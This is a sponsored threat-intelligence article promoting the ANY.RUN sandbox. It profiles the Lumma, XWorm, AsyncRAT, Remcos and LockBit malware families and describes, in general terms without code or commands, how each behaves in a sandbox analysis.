Jan 08, 2025The Hacker NewsMalware Analysis / Threat Intelligence2024 had its fair share of high-profile cyber attacks, with companies as big as Dell and TicketMaster falling victim to data breaches and other infrastructure compromises. In 2025, this trend will continue. So, to be prepared for any kind of malware attack, every organization needs to know its cyber enemy in advance. Here are 5 common malware families that you can start preparing to counter right now.LummaLumma is a widely available malware designed to steal sensitive information. It has been openly sold on the Dark Web since 2022. This malware can effectively collect and exfiltrate data from targeted applications, including login credentials, financial information, and personal details.Lumma is regularly updated to enhance its capabilities. It can log detailed information from compromised systems, such as browsing history and cryptocurrency wallet data. It can be used to install other malicious software on infected devices. In 2024, Lumma was distributed through various methods, including fake CAPTCHA pages, torrents, and targeted phishing emails.Analysis of a Lumma AttackProactive analysis of suspicious files and URLs within a sandbox environment can effectively help you prevent Lumma infection. Let's see how you can do it using ANY.RUN's cloud-based sandbox. It not only delivers definitive verdicts on malware and phishing along with actionable indicators but also allows real-time interaction with the threat and the system.Take a look at this analysis of a Lumma attack.ANY.RUN lets you manually open files and launch executablesIt starts with an archive which contains an executable. Once we launch the .exe file, the sandbox automatically logs all processes and network activities, showing Lumma's actions.Suricata IDS informs us about a malicious connection to Lumma's C2 serverIt connects to its command-and-control (C2) server. Malicious process responsible for stealing data from the systemNext, it begins to collect and exfiltrate data from the machine.You can use the IOCs extracted by the sandbox to enhance your detection systemsAfter finishing the analysis, we can export a report on this sample, featuring all the important indicators of compromise (IOCs) and TTPs that can be used to enrich defenses against possible Lumma attacks in your organization.Try all features of ANY.RUN's Interactive Sandbox for free with a 14-day trialXWormXWorm is a malicious program that gives cybercriminals remote control over infected computers. First appearing in July 2022, it can collect a wide range of sensitive information, including financial details, browsing history, saved passwords, and cryptocurrency wallet data. XWorm allows attackers to monitor victims' activities by tracking keystrokes, capturing webcam images, listening to audio input, scanning network connections, and viewing open windows. It can also access and manipulate the computer's clipboard, potentially stealing cryptocurrency wallet credentials. In 2024, XWorm was involved in many large-scale attacks, including ones that exploited CloudFlare tunnels and legitimate digital certificates.Analysis of a XWorm AttackPhishing emails are often the initial stage of XWorm attacksIn this attack, we can see the original phishing email, which features a link to a Google drive.A Google Drive page with a download link to a malicious archiveOnce we follow the link, we are offered to download an archive which is protected with a password.Opened malicious archive with a .vbs fileThe password can be found in the email. After entering it, we can access a .vbs script inside the .zip file. XWorm uses MSBuild.exe to persist on the systemAs soon as we launch the script, the sandbox instantly detects malicious activities, which eventually lead to the deployment of XWorm on the machine.AsyncRATAsyncRAT is another remote access trojan on the list. First seen in 2019, it was initially spread through spam emails, often exploiting the COVID-19 pandemic as a lure. Since then, the malware has gained popularity and been used in various cyber attacks.AsyncRAT has evolved over time to include a wide range of malicious capabilities. It can secretly record a victim's screen activity, log keystrokes, install additional malware, steal files, maintain a persistent presence on infected systems, disable security software, and launch attacks that overwhelm targeted websites.In 2024, AsyncRAT remained a significant threat, often disguised as pirated software. It was also one of the first malware families to be distributed as part of complex attacks involving scripts generated by AI.Analysis of an AsyncRAT AttackThe initial archive with an .exe fileIn this analysis session, we can see another archive with a malicious executable inside.A PowerShell process used for downloading a payloadDetonating the file kicks off the execution chain of XWorm, which involves the use of PowerShell scripts to fetch additional files needed to facilitate the infection.Once the analysis is finished, the sandbox displays the final verdict on the sample.RemcosRemcos is a malware that has been marketed by its creators as a legitimate remote access tool. Since its launch in 2019, it has been used in numerous attacks to perform a wide range of malicious activities, including stealing sensitive information, remotely controlling the system, recording keystrokes, capturing screen activity, etc.In 2024, campaigns to distribute Remcos used techniques like script-based attacks, which often start with a VBScript that launches a PowerShell script to deploy the malware, and exploited vulnerabilities like CVE-2017-11882 by leveraging malicious XML files.Analysis of a Remcos AttackPhishing email opened in ANY.RUN's Interactive SandboxIn this example, we are met with another phishing email that features a .zip attachment and a password for it.cmd process used during the infection chainThe final payload leverages Command Prompt and Windows system processes to load and execute Remcos.MITRE ATT&CK matrix provides a comprehensive view of the malware's techniquesThe ANY.RUN sandbox maps the entire chain of attack to the MITRE ATT&CK matrix for convenience. LockBitLockBit is a ransomware primarily targeting Windows devices. It is considered one of the biggest ransomware threats, accounting for a substantial portion of all Ransomware-as-a-Service (RaaS) attacks. The decentralized nature of the LockBit group has allowed it to compromise numerous high-profile organizations worldwide, including the UK's Royal Mail and India's National Aerospace Laboratories (in 2024).Law enforcement agencies have taken steps to combat the LockBit group, leading to the arrest of several developers and partners. Despite these efforts, the group continues to operate, with plans to release a new version, LockBit 4.0, in 2025.Analysis of a LockBit AttackLockBit ransomware launched in the safe environment of the ANY.RUN sandboxCheck out this sandbox session, showing how fast LockBit infects and encrypts files on a system.ANY.RUN's Interactive Sandbox lets you see static analysis of every modified file on the systemBy tracking file system changes, we can see it modified 300 files in less than a minute.Ransom note tells victims to contact attackersThe malware also drops a ransom note, detailing the instructions for getting the data back.Improve Your Proactive Security with ANY.RUN's Interactive SandboxAnalyzing cyber threats proactively instead of reacting to them once they become a problem for your organization is the best course of action any business can take. Simplify it with ANY.RUN's Interactive sandbox by examining all suspicious files and URLs inside a safe virtual environment that helps you identify malicious content with ease. With the ANY.RUN sandbox, your company can:Swiftly detect and confirm harmful files and links during scheduled checks.Investigate how malware operates on a deeper level to reveal its tactics and strategies.Respond to security incidents more effectively by collecting important threat insights through sandbox analysis.Try all features of ANY.RUN with a 14-day free trial.Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Twitter and LinkedIn to read more exclusive content we post.SHARE